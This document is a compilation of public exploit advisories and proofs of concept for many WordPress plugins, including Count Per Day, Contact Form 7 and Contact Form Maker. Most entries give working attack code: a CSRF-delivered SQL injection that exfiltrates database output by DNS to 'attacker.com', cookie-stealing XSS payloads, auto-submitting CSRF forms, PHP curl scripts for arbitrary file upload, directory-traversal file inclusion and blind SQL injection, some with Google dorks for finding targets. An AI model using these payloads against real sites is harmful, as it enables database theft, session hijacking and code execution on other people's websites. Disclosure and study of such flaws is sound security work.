CVSSv2 Base Score: 6 (AV:N/AC:M/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered SQL Injection vulnerability in Count Per Day WordPress plugin, which can be exploited to execute arbitrary SQL queries in application’s database, gain control of potentially sensitive information and compromise the entire website. 

The vulnerability is caused by insufficient filtration of input data passed via the "cpd_keep_month" HTTP POST parameter to "/wp-admin/options-general.php" script. A remote user with administrative privileges can manipulate SQL queries, inject and execute arbitrary SQL commands within the application’s database. 
This vulnerability can be exploited by anonymous attacker via CSRF vector, since the web application does not check origin of HTTP requests.

The PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):


<form action = "http://wordpress/wp-admin/options-general.php?page=count-per-day/counter-options.php&tab=tools" method = "POST" name="f1">
<input type="hidden" name="collect" value="Collect old data">
<input type="hidden" name="do" value="cpd_collect">
<input type="hidden" name="cpd_keep_month" value="6 MONTH) AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- 2">
<input value="go type="submit" />
</form><script>document.f1.submit();</script>


-----------------------------------------------------------------------------------------------

Solution:

Update to Count Per Day 3.4.1

More Information:
https://wordpress.org/plugins/count-per-day/changelog/
https://plugins.trac.wordpress.org/changeset/1190683/count-per-day

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23267 - https://www.htbridge.com/advisory/HTB23267 - SQL Injection in Count Per Day WordPress Plugin.
[2] Count Per Day WordPress plugin - https://wordpress.org/plugins/count-per-day/ - A statistics plugin which displays Visit Counter, shows reads and visitors per page, visitors today, yesterday, last week, last months and other statistics.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
HireHackking 
source: https://www.securityfocus.com/bid/58307/info

The Count Per Day plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An authenticated attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Count Per Day 3.2.5 and prior versions are vulnerable. 

http://www.example.com/wordpress/wp-admin/?page=cpd_metaboxes HTTP/1.1... /daytoshow=2013-03-04%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&showday=Show
HireHackking 
# Exploit Title: Authorized Stored XSS at WordPress Corner-Ad plugin.
# Google Dork: inurl:/wp-content/plugins/corner-ad
# Date: 16-02-17
# Exploit Author: Atik Rahman
# Vendor Homepage: https://wordpress.org/plugins/corner-ad/
# Software Link: https://downloads.wordpress.org/plugin/corner-ad.zip
# Version: 1.0.7
# Tested on: Firefox 44, Windows10


Vendor Description
---------------------

*Corner Ad* is a plugin which display you ads in a corner of your
WordPress website page.

The Plugin has 1,000+ active install.


Stored XSS in Ad Name
----------------------

Ad name input fields aren't properly escaped. This
could lead to an XSS attack that could possibly affect
administrators,users,editor.




1. Go to http://localhost/wp-admin/options-general.php?page=corner-ad.php

2. Click on create new Add button.

3. And Use Ad name as "/><svg/onload=prompt(document.domain)> *Fill
the other field.

4.Now Click on save corner Add button when it's add a new add go to the
http://localhost/wp-admin/options-general.php?page=corner-ad.php
for corner add list. And now Your xss will

be executed.

5. If a normal editor,author visit the corner add list page xss will
effect them also.
HireHackking 
<!--
=======
Software: CopySafe Web
version: <2.6
description: Add copy protection from PrintScreen and screen capture. Copysafe Web uses encrypted images and domain lock to extend copy protection for all media displayed on a web page.
========

Description
==========
CSRF in wordpress copysafe web allows attacker changes plugin settings

========

POC:
=======
-->

<form method="POST" action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=wpcsw_settings">

  <input type="text" name= "admin_only" value="checked">

 <input type="text" name="asps" value="">
 <input type="text" name="upload_path" value="">
 <input type="text" name="max_size" value="">
 <input type="text" name="mode" value=“checked”>
 <input type=“text” name="submit” value="Save Settings”>
   <input type="submit”>
</form>

<!--

=========
Mitigations
================
Disable the plugin until a new version is released that fixes this bug.

Fixed
=========
https://wordpress.org/plugins/wp-copysafe-web/ changelog ->2.6 realease
-->
HireHackking 
source: https://www.securityfocus.com/bid/68656/info

The CopySafe PDF Protection plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

CopySafe PDF Protection 0.6 and prior are vulnerable. 

<form 
action="http://www.example.com/wp-content/plugins/wp-copysafe-pdf/lib/uploadify/uploadify.php" 
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="wpcsp_file" ><br>
<input type=text name="upload_path" value="../../../../uploads/">
<input type="submit" name="submit" value="Submit">
</form>
HireHackking 
# Exploit Title: WordPress Plugin Cookie Law Bar 1.2.1 - 'clb_bar_msg' Stored Cross-Site Scripting (XSS)
# Date: 2021-05-24
# Exploit Author: Mesut Cetin
# Vendor Homepage: https://www.cookielawinfo.com/wordpress-plugin/
# Software Link: https://wordpress.org/plugins/cookie-law-bar/
# Version: 1.2.1
# Tested on: Ubuntu 16.04 LTS, Wordpress 5.7.2

# the "Bar Message" text field is vulnerable to stored XSS due to unsanitized user input
# an authenticated attacker can retrieve cookies / sensitive data of all Wordpress users

# proof of concept
# navigate to the settings of the Cookie Law Bar under

http://localhost/wp-admin/options-general.php?page=clb

# inject the payload: </script><script>alert(document.cookie)</script> into the "Bar Message field" and save it

# browsing through the Wordpress pages shows the cookies
HireHackking 
source: https://www.securityfocus.com/bid/53931/info

WordPress Contus Video Gallery is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

WordPress Contus Video Gallery 1.3 is vulnerable; other versions may also be affected. 

<?php

$uploadfile="lo.php.jpg"; 
$ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/contus-video-galleryversion-10/upload1.php");
curl_setopt($ch, CURLOPT_POST, true);   
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('myfile'=>"@$uploadfile",
               'mode'=>'image'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>
HireHackking 
# Exploit Title: Multiple Blind SQL Injections Wordpress Plugin: Content Timeline
# Google Dork: -
# Date: September 16, 2017
# Exploit Author: Jeroen - ITNerdbox
# Vendor Homepage: http://www.shindiristudio.com/
# Software Link: https://codecanyon.net/item/content-timeline-responsive-wordpress-plugin-for-displaying-postscategories-in-a-sliding-timeline/3027163
# Version: 4.4.2
# Tested on: Linux / Nginx / Wordpress 4.8.1 / PHP 7.0.22
# CVE : CVE-2017-14507

## Proof of Concept

http(s)://www.target.tld/wp-admin/admin-ajax.php?action=ctimeline_frontend_get&timeline={inject here}

## Problem in file : content_timeline_class.php    

function ajax_frontend_get(){

        $timelineId = $_GET['timeline'];

        $id = $_GET['id'];

        global $wpdb;

        if($timelineId) {

                $timeline = $wpdb->get_results('SELECT * FROM ' . $wpdb->prefix . 'ctimelines WHERE id='.$timelineId);

                $timeline = $timeline[0];

Problem exists in the GET parameter called 'timeline' which is not sanitized and used in dynamically generating the

SQL syntax.

## Problem in file : pages/content_timeline_edit.php

    if(isset($_GET['id'])) {

        global $wpdb;

        $timeline = $wpdb->get_results('SELECT * FROM ' . $wpdb->prefix . 'ctimelines WHERE id='.$_GET['id']);

Problem exists in the GET parameter called 'id' which is not sanitized and used in dynamically generating the

SQL syntax.

## Problem in file : pages/content_timeline_index.php

            if(isset($_GET['action']) && $_GET['action'] == 'delete') {

                $wpdb->query('DELETE FROM '. $prefix . 'ctimelines WHERE id = '.$_GET['id']);

            }

Problem exists in the GET parameter called 'id' which is not sanitized and used in dynamically generating the

SQL syntax.

## History

09-16-2017        Contacted the author
09-16-2017        Requested CVE-ID
09-18-2017        CVE-ID Received
09-18-2017        Contacted the author again
09-26-2017 No reaction from author, thus releasing.
HireHackking 
#  Tile: Wordpress Plugin contact-form-7 5.1.6 - Remote File Upload
#  Author: mehran feizi
#  Category: webapps
#  Date: 2020-02-11
#  vendor home page: https://wordpress.org/plugins/contact-form-7/

Vulnerable Source:
134: move_uploaded_file move_uploaded_file($file['tmp_name'], $new_file))
82: $file = $_FILES[$name] : null; 
132: $new_file = path_join($uploads_dir, $filename); 
122: $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir); 
121: $uploads_dir = wpcf7_upload_tmp_dir(); 
131: $filename = wp_unique_filename($uploads_dir, $filename); 
122: $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir); 
121: $uploads_dir = wpcf7_upload_tmp_dir(); 
128: $filename = apply_filters('wpcf7_upload_file_name', $filename, $file['name'], $tag); 
126: $filename = wpcf7_antiscript_file_name ($filename); 
125: $filename = wpcf7_canonicalize ($filename, 'as-is'); 
124: $filename = $file['name']; 
82: $file = $_FILES[$name] : null; 
82: $file = $_FILES[$name] : null; 
78: ⇓ function wpcf7_file_validation_filter($result, $tag)


Exploit:
<?php
$shahab="file.jpg";
$ch = curl_init("http://localhost/wordpress/wp-content/plugins/contact-form-7/modules/file.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('zip'=>"@$shahab"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
print "$result";
?>

Location File:
http://localhost/wordpress/wp-content/plugins/contact-form-7/file.jpg
HireHackking 
# Exploit Title: WordPress Plugin Contact Form to Email 1.3.24 - Stored Cross Site Scripting (XSS) (Authenticated)
# Date: 11/11/2021
# Exploit Author: Mohammed Aadhil Ashfaq
# Vendor Homepage: https://form2email.dwbooster.com/
# Version: 1.3.24
# Tested on: wordpress

POC
1. Click Contact form to Email
http://192.168.111.129/wp-admin/admin.php?page=cp_contactformtoemail
2. Create new form name with <script>alert(1)</script>
3. Click Publish
4. XSS has been triggered
http://192.168.111.129/wp-admin/admin.php?page=cp_contactformtoemail&pwizard=1&cal=4&r=0.8630795030649687
5. Open a different browser, logged in with wordpress. Copy the URL and
Press enter. XSS will trigger.
HireHackking 
<!--
Source: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery___cross_site_scripting_in_contact_form_manager_wordpress_plugin.html

Abstract
It was discovered that Contact Form Manager does not protect against Cross-Site Request Forgery. This allows an attacker to change arbitrary Contact Form Manager settings. In addtion, the plugin also fails to apply proper output encoding, rendering it vulnerable to stored Cross-Site Scripting.

Contact
For feedback or questions about this advisory mail us at sumofpwn at securify.nl

The Summer of Pwnage
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.

OVE ID
OVE-20160718-0003

Tested versions
These issues were successfully tested on Contact Form Manager WordPress Plugin version

Fix
There is currently no fix available.

Introduction
The Contact Form Manager WordPress Plugin lets users create and manage multiple customized contact forms for their website. It supports a wide range of contact form elements such as text field, email field, textarea, dropdown list, radio button, checkbox, date picker, captcha, and file uploader. It was discovered that Contact Form Manager does not protect against Cross-Site Request Forgery. This allows an attacker to change arbitrary Contact Form Manager settings. In addtion, the plugin also fails to apply proper output encoding, rendering it vulnerable to stored Cross-Site Scripting.

Details
These issues exists, because the plugin lacks an anti-CSRF token. Also improper filtering/output encoding is done on $_POST parameters. These issues are present in the filed contact-form-manager/admin/add_smtp.php and contact-form-manager/admin/form-edit.php.

The username input field on the XYZ Contact > SMTP Settings is vulnerable for Cross-Site Scripting, as wel as the Contact Form Name input field on the XYZ Contact > Contact Form page.

SMTP Settings URL:
http://<target>/wp-admin/admin.php?page=contact-form-manager-manage-smtp

Contact Forms URL:
http://<target>/wp-admin/admin.php?page=contact-form-manager-managecontactformsp

Proof of concept:
-->

<html>
   <body>
      <form id="f1" method="POST" action="http://<target>/wp-admin/admin.php?page=contact-form-manager-manage-smtp&action=add-smtp">
         <table>
            <tr><td>xyz_cfm_SmtpAuthentication<td><input name="xyz_cfm_SmtpAuthentication" value="true" size="100"></tr>
            <tr><td>xyz_cfm_SmtpEmailAddress<td><input name="xyz_cfm_SmtpEmailAddress" value="<svg onload=alert(document.domain)>" size="100"></tr>
            <tr><td>xyz_cfm_SmtpHostName<td><input name="xyz_cfm_SmtpHostName" value="<svg onload=alert(document.domain)>" size="100"></tr>
            <tr><td>xyz_cfm_SmtpPassword<td><input name="xyz_cfm_SmtpPassword" value="<svg onload=alert(document.domain)>" size="100"></tr>
            <tr><td>xyz_cfm_SmtpPortNumber<td><input name="xyz_cfm_SmtpPortNumber" value="25" size="100"></tr>
            <tr><td>xyz_cfm_SmtpSecuirity<td><input name="xyz_cfm_SmtpSecuirity" value="notls" size="100"></tr>
         </table>
      </form>
      <button onclick="document.getElementById('f1').submit()">Submit</button>
   </body>
</html>
HireHackking 
# Exploit Title: Contact Form by WD [CSRF → LFI]
# Date: 2019-03-17
# Exploit Author: Panagiotis Vagenas
# Vendor Homepage: http://web-dorado.com/
# Software Link: https://wordpress.org/plugins/contact-form-maker
# Version: 1.13.1
# Tested on: WordPress 5.1.1

Description
-----------

Plugin implements the following AJAX actions:

- `manage_fm`
- `get_stats`
- `generete_csv`
- `generete_xml`
- `formmakerwdcaptcha`
- `nopriv_formmakerwdcaptcha`
- `formmakerwdmathcaptcha`
- `nopriv_formmakerwdmathcaptcha`
- `product_option`
- `FormMakerEditCountryinPopup`
- `FormMakerMapEditinPopup`
- `FormMakerIpinfoinPopup`
- `show_matrix`
- `FormMakerSubmits`
- `FormMakerSQLMapping`
- `select_data_from_db`
- `manage`

All of them call the function `form_maker_ajax_fmc`. This function
dynamicaly loads a file defined in `$_GET['action']` or
`$_POST['action']` if the former is not defined. Because of the way
WordPress defines the AJAX action a user could define the plugin action
in the `$_GET['action']` and AJAX action in `$_POST['action']`.
Leveraging that and the fact that no sanitization is performed on the
`$_GET['action']`, a malicious actor can perform a CSRF attack to load a
file using directory traversal thus leading to Local File Inclusion
vulnerability.

The following AJAX actions are available only for the paid version of
the plugin:

- `paypal_info`
- `checkpaypal`
- `nopriv_checkpaypal`
- `get_frontend_stats`
- `nopriv_get_frontend_stats`
- `frontend_show_map`
- `nopriv_frontend_show_map`
- `frontend_show_matrix`
- `nopriv_frontend_show_matrix`
- `frontend_paypal_info`
- `nopriv_frontend_paypal_info`
- `frontend_generate_csv`
- `nopriv_frontend_generate_csv`
- `frontend_generate_xml`
- `nopriv_frontend_generate_xml`
- `FMShortocde`
- `wd_bp_dismiss`

In both free and paid versions, there are no-privilege actions that can
be exploited by unauthenticated users in order to include local files.

PoC
---

```html
<form method="post"
action="http://wp-csrf-new.test/wp-admin/admin-ajax.php?action=../../../../../index.php">
    <label>AJAX action:
        <select name="action">
            <optgroup label="Free version">
                <option value="FMShortocde_fmc">FMShortocde_fmc</option>
                <option
value="FormMakerEditCountryinPopup_fmc">FormMakerEditCountryinPopup_fmc</option>
                <option
value="FormMakerIpinfoinPopup_fmc">FormMakerIpinfoinPopup_fmc</option>
                <option
value="FormMakerMapEditinPopup_fmc">FormMakerMapEditinPopup_fmc</option>
                <option
value="FormMakerSQLMapping_fmc">FormMakerSQLMapping_fmc</option>
                <option
value="FormMakerSubmits_fmc">FormMakerSubmits_fmc</option>
                <option
value="formmakerwdcaptcha_fmc">formmakerwdcaptcha_fmc</option>
                <option
value="formmakerwdmathcaptcha_fmc">formmakerwdmathcaptcha_fmc</option>
                <option
value="frontend_show_matrix_fmc">frontend_show_matrix_fmc</option>
                <option value="generete_csv_fmc">generete_csv_fmc</option>
                <option value="generete_xml_fmc">generete_xml_fmc</option>
                <option value="get_stats_fmc">get_stats_fmc</option>
                <option value="manage_fmc">manage_fmc</option>
                <option value="manage_fm_fmc">manage_fm_fmc</option>
                <option
value="nopriv_formmakerwdcaptcha_fmc">nopriv_formmakerwdcaptcha_fmc</option>
                <option
value="nopriv_formmakerwdmathcaptcha_fmc">nopriv_formmakerwdmathcaptcha_fmc</option>
                <option
value="product_option_fmc">product_option_fmc</option>
                <option
value="select_data_from_db_fmc">select_data_from_db_fmc</option>
                <option value="wd_bp_dismiss_fmc">wd_bp_dismiss_fmc</option>
            </optgroup>
            <optgroup label="Pro Version">
                <option value="paypal_info_fmc">paypal_info_fmc</option>
                <option value="checkpaypal_fmc">checkpaypal_fmc</option>
                <option
value="nopriv_checkpaypal_fmc">nopriv_checkpaypal_fmc</option>
                <option
value="nopriv_get_frontend_stats_fmc">nopriv_get_frontend_stats_fmc</option>
                <option
value="get_frontend_stats_fmc">get_frontend_stats_fmc</option>
                <option
value="frontend_show_map_fmc">frontend_show_map_fmc</option>
                <option
value="nopriv_frontend_show_map_fmc">nopriv_frontend_show_map_fmc</option>
                <option value="show_matrix_fmc">show_matrix_fmc</option>
                <option
value="nopriv_frontend_show_matrix_fmc">nopriv_frontend_show_matrix_fmc</option>
                <option
value="frontend_paypal_info_fmc">frontend_paypal_info_fmc</option>
                <option
value="nopriv_frontend_paypal_info_fmc">nopriv_frontend_paypal_info_fmc</option>
                <option
value="frontend_generate_csv_fmc">frontend_generate_csv_fmc</option>
                <option
value="nopriv_frontend_generate_csv_fmc">nopriv_frontend_generate_csv_fmc</option>
                <option
value="frontend_generate_xml_fmc">frontend_generate_xml_fmc</option>
                <option
value="nopriv_frontend_generate_xml_fmc">nopriv_frontend_generate_xml_fmc</option>
            </optgroup>
        </select>
    </label>
    <button type="submit" value="Submit">Submit</button>
</form>

```
HireHackking 
# Title: WordPress Contact Form Maker Plugin 1.12.20 - SQL Injection
# Date: 2018-06-07
# Author: Neven Biruski
# Software: WordPress Contact Form Maker plugin
# Software link: https://wordpress.org/plugins/contact-form-maker/
# Version: 1.12.20 and below

# The easiest way to reproduce the SQL injection vulnerabilities is to
# open the presented HTML/JavaScript snippet in your browser while being
# logged in as administrator or another user that is authorized to
# access the plugin settings page. Users that do not have full
# administrative privileges could abuse the database access the
# vulnerabilities provide to either escalate their privileges or obtain
# and modify database contents they were not supposed to be able to.


# PoC 1

<iframe style="display:none" name="invisible"></iframe>
<form id="form" method="POST" action="http://vulnerablesite.com/wp-admin/admin-ajax.php?action=FormMakerSQLMapping_fmc&task=db_table_struct"
target="invisible">
<input type="hidden" name="name" value="wp_users WHERE 42=42 AND SLEEP(42)--;"/>
</form>
<script>
 document.getElementById("form").submit();
 sleep(3000);
</script>

# PoC 2

<iframe style="display:none" name="invisible"></iframe>
<form id="form" method="POST" action="http://vulnerablesite.com/wp-admin/admin-ajax.php?form_id=1&send_header=0&action=generete_csv_fmc&limitstart=0"
target="invisible">
<input type="hidden" name="search_labels" value="(SELECT * FROM (SELECT(SLEEP(42)))XXX)"/>
</form>
<script>
 document.getElementById("form").submit();
 sleep(3000);
</script>